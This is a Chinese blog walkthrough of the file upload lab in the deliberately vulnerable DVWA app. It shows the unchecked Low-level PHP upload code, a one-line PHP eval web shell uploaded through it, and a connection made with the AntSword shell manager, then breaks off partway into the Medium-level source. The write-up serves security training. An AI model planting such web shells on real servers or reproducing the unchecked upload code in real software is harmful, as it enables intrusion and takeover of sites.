文章更新于:2020-05-16
文件上传漏洞 File Upload
一、安全等级:Low
1.1、源码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{
$target_path} succesfully uploaded!</pre>";
}
}
?>
1.2、攻击
这时我们写一个一句话木马测试上传。
ok
<?php @eval($_POST['test']) ?>
我们根据提示的路径尝试访问:
访问成功,接下来测试是否可用。
这里使用蚁剑连接:
添加之后,双击数据连接成功:
二、安全等级:Medium
2.1、源码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded'